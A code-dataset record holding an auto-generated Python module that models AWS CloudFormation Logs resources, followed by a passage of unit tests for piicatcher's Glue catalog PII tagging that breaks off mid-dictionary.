hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
07e7231c23fc0949a2194bbec01af79d77f01473 | 18,299 | py | Python | cottonformation/res/logs.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 5 | 2021-07-22T03:45:59.000Z | 2021-12-17T21:07:14.000Z | cottonformation/res/logs.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 1 | 2021-06-25T18:01:31.000Z | 2021-06-25T18:01:31.000Z | cottonformation/res/logs.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 2 | 2021-06-27T03:08:21.000Z | 2021-06-28T22:15:51.000Z | # -*- coding: utf-8 -*-
"""
This module
"""
import attr
import typing
from ..core.model import (
Property, Resource, Tag, GetAtt, TypeHint, TypeCheck,
)
from ..core.constant import AttrMeta
#--- Property declaration ---
@attr.s
class PropMetricFilterMetricTransformation(Property):
"""
AWS Object Type = "AWS::Logs::MetricFilter.MetricTransformation"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html
Property Document:
- ``rp_MetricName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricname
- ``rp_MetricNamespace``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricnamespace
- ``rp_MetricValue``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricvalue
- ``p_DefaultValue``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-defaultvalue
"""
AWS_OBJECT_TYPE = "AWS::Logs::MetricFilter.MetricTransformation"
rp_MetricName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "MetricName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricname"""
rp_MetricNamespace: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "MetricNamespace"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricnamespace"""
rp_MetricValue: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "MetricValue"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricvalue"""
p_DefaultValue: float = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(float)),
metadata={AttrMeta.PROPERTY_NAME: "DefaultValue"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-defaultvalue"""
#--- Resource declaration ---
@attr.s
class MetricFilter(Resource):
"""
AWS Object Type = "AWS::Logs::MetricFilter"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html
Property Document:
- ``rp_FilterPattern``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-filterpattern
- ``rp_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-loggroupname
- ``rp_MetricTransformations``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-metrictransformations
"""
AWS_OBJECT_TYPE = "AWS::Logs::MetricFilter"
rp_FilterPattern: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "FilterPattern"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-filterpattern"""
rp_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-loggroupname"""
rp_MetricTransformations: typing.List[typing.Union['PropMetricFilterMetricTransformation', dict]] = attr.ib(
default=None,
converter=PropMetricFilterMetricTransformation.from_list,
validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropMetricFilterMetricTransformation), iterable_validator=attr.validators.instance_of(list)),
metadata={AttrMeta.PROPERTY_NAME: "MetricTransformations"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-metrictransformations"""
@attr.s
class Destination(Resource):
"""
AWS Object Type = "AWS::Logs::Destination"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html
Property Document:
- ``rp_DestinationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationname
- ``rp_DestinationPolicy``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationpolicy
- ``rp_RoleArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-rolearn
- ``rp_TargetArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-targetarn
"""
AWS_OBJECT_TYPE = "AWS::Logs::Destination"
rp_DestinationName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "DestinationName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationname"""
rp_DestinationPolicy: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "DestinationPolicy"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationpolicy"""
rp_RoleArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RoleArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-rolearn"""
rp_TargetArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "TargetArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-targetarn"""
@property
def rv_Arn(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#aws-resource-logs-destination-return-values"""
return GetAtt(resource=self, attr_name="Arn")
@attr.s
class LogGroup(Resource):
"""
AWS Object Type = "AWS::Logs::LogGroup"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html
Property Document:
- ``p_KmsKeyId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-kmskeyid
- ``p_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-loggroupname
- ``p_RetentionInDays``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-retentionindays
- ``p_Tags``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-tags
"""
AWS_OBJECT_TYPE = "AWS::Logs::LogGroup"
p_KmsKeyId: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "KmsKeyId"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-kmskeyid"""
p_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-loggroupname"""
p_RetentionInDays: int = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(int)),
metadata={AttrMeta.PROPERTY_NAME: "RetentionInDays"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-retentionindays"""
p_Tags: typing.List[typing.Union[Tag, dict]] = attr.ib(
default=None,
converter=Tag.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(Tag), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "Tags"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-tags"""
@property
def rv_Arn(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#aws-resource-logs-loggroup-return-values"""
return GetAtt(resource=self, attr_name="Arn")
@attr.s
class ResourcePolicy(Resource):
"""
AWS Object Type = "AWS::Logs::ResourcePolicy"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html
Property Document:
- ``rp_PolicyDocument``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policydocument
- ``rp_PolicyName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policyname
"""
AWS_OBJECT_TYPE = "AWS::Logs::ResourcePolicy"
rp_PolicyDocument: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "PolicyDocument"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policydocument"""
rp_PolicyName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "PolicyName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policyname"""
@attr.s
class LogStream(Resource):
"""
AWS Object Type = "AWS::Logs::LogStream"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html
Property Document:
- ``rp_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-loggroupname
- ``p_LogStreamName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-logstreamname
"""
AWS_OBJECT_TYPE = "AWS::Logs::LogStream"
rp_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-loggroupname"""
p_LogStreamName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "LogStreamName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-logstreamname"""
@attr.s
class SubscriptionFilter(Resource):
"""
AWS Object Type = "AWS::Logs::SubscriptionFilter"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html
Property Document:
- ``rp_DestinationArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-destinationarn
- ``rp_FilterPattern``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-filterpattern
- ``rp_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-loggroupname
- ``p_RoleArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-rolearn
"""
AWS_OBJECT_TYPE = "AWS::Logs::SubscriptionFilter"
rp_DestinationArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "DestinationArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-destinationarn"""
rp_FilterPattern: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "FilterPattern"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-filterpattern"""
rp_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-loggroupname"""
p_RoleArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "RoleArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-rolearn"""
@attr.s
class QueryDefinition(Resource):
"""
AWS Object Type = "AWS::Logs::QueryDefinition"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html
Property Document:
- ``rp_Name``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-name
- ``rp_QueryString``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-querystring
- ``p_LogGroupNames``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-loggroupnames
"""
AWS_OBJECT_TYPE = "AWS::Logs::QueryDefinition"
rp_Name: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "Name"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-name"""
rp_QueryString: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "QueryString"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-querystring"""
p_LogGroupNames: typing.List[TypeHint.intrinsic_str] = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupNames"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-loggroupnames"""
@property
def rv_QueryDefinitionId(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#aws-resource-logs-querydefinition-return-values"""
return GetAtt(resource=self, attr_name="QueryDefinitionId")
| 53.349854 | 208 | 0.751735 | 2,041 | 18,299 | 6.638903 | 0.048016 | 0.037196 | 0.051144 | 0.079041 | 0.909594 | 0.907749 | 0.865683 | 0.858007 | 0.85476 | 0.852915 | 0 | 0.000062 | 0.113613 | 18,299 | 342 | 209 | 53.505848 | 0.835327 | 0.342259 | 0 | 0.438596 | 0 | 0 | 0.073261 | 0.028997 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017544 | false | 0 | 0.023392 | 0 | 0.304094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6af7d377552fc083a0f6814fc4fecde580ba5e35 | 11,532 | py | Python | tests/test_glue.py | dm03514/piicatcher | c9c30d2dbda4d8c3d0e0d48e66dc282a22503b54 | [
"Apache-2.0"
] | null | null | null | tests/test_glue.py | dm03514/piicatcher | c9c30d2dbda4d8c3d0e0d48e66dc282a22503b54 | [
"Apache-2.0"
] | 1 | 2020-12-18T05:01:38.000Z | 2020-12-18T05:01:38.000Z | tests/test_glue.py | grofers/piicatcher | 181d008ba0aea4d7101fa83ddc075e9106164106 | [
"Apache-2.0"
] | null | null | null | import datetime
import unittest
from dateutil.tz import tzlocal
from piicatcher.catalog.glue import GlueStore
from tests.test_models import MockExplorer
class PiiTable(unittest.TestCase):
def test_no_pii(self):
pii_table = GlueStore.get_pii_table(MockExplorer.get_no_pii_table())
self.assertEqual({}, pii_table)
def test_partial_pii(self):
pii_table = GlueStore.get_pii_table(MockExplorer.get_partial_pii_table())
self.assertEqual({"a": ["PiiTypes.PHONE"]}, pii_table)
def test_full_pii(self):
pii_table = GlueStore.get_pii_table(MockExplorer.get_full_pii_table())
self.assertEqual(
{"a": ["PiiTypes.PHONE"], "b": ["PiiTypes.ADDRESS", "PiiTypes.LOCATION"]},
pii_table,
)
class UpdateParameters(unittest.TestCase):
def test_empty_table(self):
columns = [
{"Name": "dispatching_base_num", "Type": "string"},
{"Name": "pickup_datetime", "Type": "string"},
{"Name": "dropoff_datetime", "Type": "string"},
{"Name": "pulocationid", "Type": "bigint"},
{"Name": "dolocationid", "Type": "bigint"},
{"Name": "sr_flag", "Type": "bigint"},
{"Name": "hvfhs_license_num", "Type": "string"},
]
updated, is_updated = GlueStore.update_column_parameters(columns, {})
self.assertFalse(is_updated)
self.assertEqual(columns, updated)
def test_for_update(self):
columns = [
{"Name": "locationid", "Type": "bigint"},
{"Name": "borough", "Type": "string"},
{"Name": "zone", "Type": "string"},
{"Name": "service_zone", "Type": "string"},
]
expected = [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "service_zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
]
pii_table = {
"borough": ["PiiTypes.ADDRESS"],
"zone": ["PiiTypes.ADDRESS"],
"service_zone": ["PiiTypes.ADDRESS"],
}
updated, is_updated = GlueStore.update_column_parameters(columns, pii_table)
self.assertTrue(is_updated)
self.assertEqual(expected, columns)
def test_param_no_update(self):
columns = [
{"Name": "locationid", "Type": "bigint", "Parameters": {"a": "b"}},
{"Name": "borough", "Type": "string"},
]
updated, is_updated = GlueStore.update_column_parameters(columns, {})
self.assertFalse(is_updated)
self.assertEqual(columns, updated)
def test_param_update(self):
columns = [
{"Name": "locationid", "Type": "bigint",},
{"Name": "borough", "Type": "string", "Parameters": {"a": "b"}},
]
pii_table = {
"borough": ["PiiTypes.ADDRESS"],
}
expected = [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"a": "b", "PII": "PiiTypes.ADDRESS"},
},
]
updated, is_updated = GlueStore.update_column_parameters(columns, pii_table)
self.assertTrue(is_updated)
self.assertEqual(expected, columns)
class TableParams(unittest.TestCase):
def test_update(self):
updated_columns = [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "service_zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
]
table_params = {
"Name": "csv_misc",
"DatabaseName": "taxidata",
"Owner": "owner",
"CreateTime": datetime.datetime(2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()),
"UpdateTime": datetime.datetime(2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()),
"LastAccessTime": datetime.datetime(
2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()
),
"Retention": 0,
"StorageDescriptor": {
"Columns": [
{"Name": "locationid", "Type": "bigint"},
{"Name": "borough", "Type": "string"},
{"Name": "zone", "Type": "string"},
{"Name": "service_zone", "Type": "string"},
],
"Location": "s3://nyc-tlc/misc/",
"InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
"OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
"Compressed": False,
"NumberOfBuckets": -1,
"SerdeInfo": {
"SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
"Parameters": {"field.delim": ","},
},
"BucketColumns": [],
"SortColumns": [],
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*",'
'"s3://nyc-tlc/misc/uber*","s3://nyc-tlc/misc/*.html",'
'"s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
"StoredAsSubDirectories": False,
},
"PartitionKeys": [],
"TableType": "EXTERNAL_TABLE",
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*","s3://nyc-tlc/misc/uber*",'
